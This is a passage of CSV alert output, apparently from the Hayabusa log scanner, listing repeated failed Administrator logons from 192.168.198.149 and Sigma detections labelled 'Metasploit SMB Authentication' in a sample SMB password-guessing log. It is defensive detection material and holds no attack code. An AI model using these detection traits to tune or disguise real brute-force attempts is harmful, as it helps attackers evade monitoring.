Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6KME1I6tE0v9UAq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Qtt1rk4n3tOJko2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: prPsA8EZHGfGPSHm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TQqGXnwHtB87LSzT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6uLT1bjaIS0XBsWC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PIgpraQTxFrcLphN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1D6qy57XImq4prx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Kw44Ffh4DIPlyuM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oKUdmKU74RmJysAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gZUTzZw0T1tYRSP5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nEOfjuAMa7HTsfcP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e7bG19emMTmyBQNm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YsLkgWukfqS3wWJK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: liFcZjjpY3xXwe9j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vBUgbfzx2OEcOxWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iVCV0WoZmLTFNH71 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJmxGOqck4oQi1kL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w7lYqaUvEtTp18DK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yZ9xQmGn61JJDeQS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XuMXpvY9fmLm0eBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ofesuNErTLWuN0k4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KsNq7SThd3b8oTwF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmRWg5gNRcxDMFjg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JXrGn6LehVwTGNNj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vIq9DS71jCjWbgdY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kw2BQbdUml0EPNOs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ugOqsKQFGmmLac3s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3rZHUbOUVBYiHarB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: otv8ByrbWWoTz7pi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HVlHkJu4Gxc9dhxM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xKF5OCqLVVKvung0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: avAdpkOlP0xji1vG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VFgzMjEz6M0LBnX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kdJb0obVAqkY9GCw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ciSoQcLUgLfzaNg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RECrGCCTJuDPlvYJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Z2w67uyC2NOgecT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRVetRdHvz0lJkOC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yXrtxquzyzxKnQgD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWOoEIEem7Q9Mdx0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86n5nIm04810NptD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M08noHtTqqx3pxSe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3P983pRVfCVlVTyA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eMKlcLvRhlx9FMcZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0gwEDgRF2wUgTDAy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I9Q2GSALfiuEbulo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DKTja76Qe9vSjrdN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 